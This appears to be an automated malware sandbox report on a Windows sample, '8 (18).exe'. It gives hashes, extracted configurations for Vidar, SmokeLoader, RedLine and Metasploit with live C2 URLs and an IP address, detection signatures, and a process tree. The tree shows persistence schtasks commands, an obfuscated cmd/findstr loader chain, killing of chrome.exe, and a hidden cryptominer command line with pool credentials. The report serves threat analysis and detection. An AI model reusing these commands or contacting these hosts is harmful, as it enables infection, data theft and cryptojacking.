Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    37s
  • max time network
    1837s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    07-08-2021 23:12

General

  • Target

    8 (18).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

vidar

Version

39.9

Botnet

937

C2

https://prophefliloc.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

Focus1

C2

135.148.139.222:33569

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 7 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1

    suricata: ET MALWARE GCleaner Downloader Activity M1

  • suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

    suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 17 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 20 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 11 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies data under HKEY_USERS 6 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:472
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:872
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {E9917F5D-9B69-42EE-B961-C54B2838B67F} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
          3⤵
            PID:3196
            • C:\Users\Admin\AppData\Roaming\cgefjse
              C:\Users\Admin\AppData\Roaming\cgefjse
              4⤵
                PID:2196
                • C:\Users\Admin\AppData\Roaming\cgefjse
                  C:\Users\Admin\AppData\Roaming\cgefjse
                  5⤵
                    PID:4224
                • C:\Users\Admin\AppData\Roaming\fwefjse
                  C:\Users\Admin\AppData\Roaming\fwefjse
                  4⤵
                    PID:3808
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                    4⤵
                      PID:4444
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                        5⤵
                          PID:2476
                      • C:\Users\Admin\AppData\Local\67b484c7-c756-4697-a953-ab623e3cdca0\E7C0.exe
                        C:\Users\Admin\AppData\Local\67b484c7-c756-4697-a953-ab623e3cdca0\E7C0.exe --Task
                        4⤵
                          PID:3456
                          • C:\Users\Admin\AppData\Local\67b484c7-c756-4697-a953-ab623e3cdca0\E7C0.exe
                            C:\Users\Admin\AppData\Local\67b484c7-c756-4697-a953-ab623e3cdca0\E7C0.exe --Task
                            5⤵
                              PID:4712
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            4⤵
                              PID:3376
                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                5⤵
                                  PID:2612
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                    6⤵
                                    • Creates scheduled task(s)
                                    PID:3520
                              • C:\Users\Admin\AppData\Local\67b484c7-c756-4697-a953-ab623e3cdca0\E7C0.exe
                                C:\Users\Admin\AppData\Local\67b484c7-c756-4697-a953-ab623e3cdca0\E7C0.exe --Task
                                4⤵
                                  PID:4684
                                  • C:\Users\Admin\AppData\Local\67b484c7-c756-4697-a953-ab623e3cdca0\E7C0.exe
                                    C:\Users\Admin\AppData\Local\67b484c7-c756-4697-a953-ab623e3cdca0\E7C0.exe --Task
                                    5⤵
                                      PID:4468
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    4⤵
                                      PID:2468
                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        5⤵
                                          PID:4076
                                      • C:\Users\Admin\AppData\Roaming\fwefjse
                                        C:\Users\Admin\AppData\Roaming\fwefjse
                                        4⤵
                                          PID:3988
                                      • C:\Windows\system32\taskeng.exe
                                        taskeng.exe {AEED505A-A16C-4814-852D-321AA8A9E659} S-1-5-18:NT AUTHORITY\System:Service:
                                        3⤵
                                          PID:3176
                                          • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                            "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
                                            4⤵
                                              PID:3736
                                            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
                                              4⤵
                                                PID:4952
                                              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
                                                4⤵
                                                  PID:952
                                                • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
                                                  4⤵
                                                    PID:3124
                                                  • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                    "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
                                                    4⤵
                                                      PID:4524
                                                    • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                      "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
                                                      4⤵
                                                        PID:3548
                                                      • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                        "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
                                                        4⤵
                                                          PID:4956
                                                        • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                          "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
                                                          4⤵
                                                            PID:4700
                                                          • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                            "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
                                                            4⤵
                                                              PID:3588
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                          2⤵
                                                          • Checks processor information in registry
                                                          • Modifies data under HKEY_USERS
                                                          • Modifies registry class
                                                          PID:1752
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                          2⤵
                                                            PID:2532
                                                          • C:\Windows\system32\msiexec.exe
                                                            C:\Windows\system32\msiexec.exe /V
                                                            2⤵
                                                              PID:4544
                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                C:\Windows\syswow64\MsiExec.exe -Embedding DB4229C1A4C9463C33DF03C053F5A724 C
                                                                3⤵
                                                                  PID:4920
                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 15DEA074C79FDD517DC5380E5FDB1A33
                                                                  3⤵
                                                                    PID:3440
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                      4⤵
                                                                      • Kills process with taskkill
                                                                      PID:4024
                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding AD2EB724FB001727FD93CF81B2711405 M Global\MSI0000
                                                                    3⤵
                                                                      PID:5056
                                                                • C:\Users\Admin\AppData\Local\Temp\8 (18).exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\8 (18).exe"
                                                                  1⤵
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:1208
                                                                  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:1744
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0D6E8ED4\setup_install.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\7zS0D6E8ED4\setup_install.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:268
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                                        4⤵
                                                                        • Loads dropped DLL
                                                                        PID:400
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D6E8ED4\sonia_1.exe
                                                                          sonia_1.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          PID:1716
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                        4⤵
                                                                        • Loads dropped DLL
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:992
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D6E8ED4\sonia_2.exe
                                                                          sonia_2.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Checks SCSI registry key(s)
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious behavior: MapViewOfSection
                                                                          PID:664
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                                        4⤵
                                                                        • Loads dropped DLL
                                                                        PID:440
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D6E8ED4\sonia_3.exe
                                                                          sonia_3.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Modifies system certificate store
                                                                          PID:1240
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1240 -s 940
                                                                            6⤵
                                                                            • Loads dropped DLL
                                                                            • Program crash
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2132
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                        4⤵
                                                                        • Loads dropped DLL
                                                                        PID:1260
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D6E8ED4\sonia_4.exe
                                                                          sonia_4.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Modifies system certificate store
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:316
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                                        4⤵
                                                                        • Loads dropped DLL
                                                                        PID:1368
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D6E8ED4\sonia_5.exe
                                                                          sonia_5.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Modifies system certificate store
                                                                          PID:624
                                                                          • C:\Users\Admin\Documents\iQcNjDRjhfy4Rf_4osamZRQ_.exe
                                                                            "C:\Users\Admin\Documents\iQcNjDRjhfy4Rf_4osamZRQ_.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            PID:2236
                                                                            • C:\Users\Admin\AppData\Local\Temp\fyzup3ac.lvm.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\fyzup3ac.lvm.exe"
                                                                              7⤵
                                                                                PID:2868
                                                                                • C:\Users\Admin\AppData\Roaming\HashModule.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\HashModule.exe"
                                                                                  8⤵
                                                                                    PID:2860
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Internalprosecc" /tr '"C:\Users\Admin\AppData\Roaming\Internalprosecc.exe"' & exit
                                                                                      9⤵
                                                                                        PID:2312
                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "Internalprosecc" /tr '"C:\Users\Admin\AppData\Roaming\Internalprosecc.exe"'
                                                                                          10⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:3824
                                                                                      • C:\Users\Admin\AppData\Roaming\Internalprosecc.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\Internalprosecc.exe"
                                                                                        9⤵
                                                                                          PID:2396
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Internalprosecc" /tr '"C:\Users\Admin\AppData\Roaming\Internalprosecc.exe"' & exit
                                                                                            10⤵
                                                                                              PID:2220
                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "Internalprosecc" /tr '"C:\Users\Admin\AppData\Roaming\Internalprosecc.exe"'
                                                                                                11⤵
                                                                                                • Creates scheduled task(s)
                                                                                                PID:3424
                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                              10⤵
                                                                                                PID:1532
                                                                                              • C:\Windows\explorer.exe
                                                                                                C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6031730 --pass=nixwaree --cpu-max-threads-hint=40 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth
                                                                                                10⤵
                                                                                                  PID:2484
                                                                                            • C:\Users\Admin\AppData\Roaming\Intilizate.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\Intilizate.exe"
                                                                                              8⤵
                                                                                                PID:584
                                                                                              • C:\Users\Admin\AppData\Roaming\SystemPropertiesAdvance.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\SystemPropertiesAdvance.exe"
                                                                                                8⤵
                                                                                                  PID:3880
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SseMZK3W5O.bat"
                                                                                                    9⤵
                                                                                                      PID:4748
                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                        chcp 65001
                                                                                                        10⤵
                                                                                                          PID:4884
                                                                                                        • C:\Windows\system32\w32tm.exe
                                                                                                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                          10⤵
                                                                                                            PID:4900
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8 (6)\E7C0.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\8 (6)\E7C0.exe"
                                                                                                            10⤵
                                                                                                              PID:5080
                                                                                                        • C:\Users\Admin\AppData\Roaming\WindowsInternal.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\WindowsInternal.exe"
                                                                                                          8⤵
                                                                                                            PID:3640
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsInternal" /tr '"C:\Users\Admin\AppData\Roaming\WindowsInternal.exe"' & exit
                                                                                                              9⤵
                                                                                                                PID:3752
                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "WindowsInternal" /tr '"C:\Users\Admin\AppData\Roaming\WindowsInternal.exe"'
                                                                                                                  10⤵
                                                                                                                  • Creates scheduled task(s)
                                                                                                                  PID:864
                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                                                                                                9⤵
                                                                                                                  PID:3780
                                                                                                              • C:\Users\Admin\AppData\Roaming\WindscribeLauncher.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\WindscribeLauncher.exe"
                                                                                                                8⤵
                                                                                                                  PID:3840
                                                                                                                • C:\Users\Admin\AppData\Roaming\AkrienPremium.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\AkrienPremium.exe"
                                                                                                                  8⤵
                                                                                                                    PID:2512
                                                                                                              • C:\Users\Admin\Documents\SEmBNRkes9rm0izbUZp_KgeB.exe
                                                                                                                "C:\Users\Admin\Documents\SEmBNRkes9rm0izbUZp_KgeB.exe"
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:2288
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                  7⤵
                                                                                                                    PID:5088
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                      8⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:3092
                                                                                                                • C:\Users\Admin\Documents\ow42sHAtTwqAiKEBVv8kYM8r.exe
                                                                                                                  "C:\Users\Admin\Documents\ow42sHAtTwqAiKEBVv8kYM8r.exe"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:2272
                                                                                                                  • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                    "C:\Windows\System32\dllhost.exe"
                                                                                                                    7⤵
                                                                                                                      PID:2488
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c cmd < Continua.pptx
                                                                                                                      7⤵
                                                                                                                        PID:2600
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd
                                                                                                                          8⤵
                                                                                                                            PID:1572
                                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                                              findstr /V /R "^hrVmJwToKxUzJbufzBCieeoCYvJHZAdLamrEFkwMUIyxRybgpVUzcLJlUzAjsjoltowlzBJiAQhzXOKSZcbrGWfHQSKjKOxHAVdJthUHjMSFbfhyIHhWOtDiSxxBRbbMcF$" Palpito.pptx
                                                                                                                              9⤵
                                                                                                                                PID:1492
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                                Dir.exe.com p
                                                                                                                                9⤵
                                                                                                                                  PID:2388
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                                    10⤵
                                                                                                                                      PID:1264
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                                        11⤵
                                                                                                                                          PID:3396
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                                            12⤵
                                                                                                                                              PID:3716
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                                                13⤵
                                                                                                                                                  PID:2064
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                                                    14⤵
                                                                                                                                                      PID:3768
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                                                        15⤵
                                                                                                                                                          PID:2224
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                                                            16⤵
                                                                                                                                                              PID:3300
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                                                                17⤵
                                                                                                                                                                  PID:3972
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                                                                    18⤵
                                                                                                                                                                      PID:3172
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                                                                        19⤵
                                                                                                                                                                          PID:4256
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                                                                            20⤵
                                                                                                                                                                              PID:4480
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                                                                                21⤵
                                                                                                                                                                                  PID:4708
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                                                                                    22⤵
                                                                                                                                                                                      PID:4908
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                                                                                        23⤵
                                                                                                                                                                                          PID:4980
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                                                                                            24⤵
                                                                                                                                                                                              PID:5060
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                                                                                                25⤵
                                                                                                                                                                                                  PID:3580
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                                                                                                    26⤵
                                                                                                                                                                                                      PID:4176
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                                                                                                        27⤵
                                                                                                                                                                                                          PID:3320
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                                                                                                            28⤵
                                                                                                                                                                                                              PID:4156
                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        ping localhost -n 30
                                                                                                                                                                        9⤵
                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                        PID:1736
                                                                                                                                                                • C:\Users\Admin\Documents\pkjnzDkV3VrWb4fxbMKY8Gyf.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\pkjnzDkV3VrWb4fxbMKY8Gyf.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:2260
                                                                                                                                                                  • C:\Users\Admin\Documents\pkjnzDkV3VrWb4fxbMKY8Gyf.exe
                                                                                                                                                                    C:\Users\Admin\Documents\pkjnzDkV3VrWb4fxbMKY8Gyf.exe
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:2648
                                                                                                                                                                  • C:\Users\Admin\Documents\j_K8boFlz3UlRd5HTaTJcKgw.exe
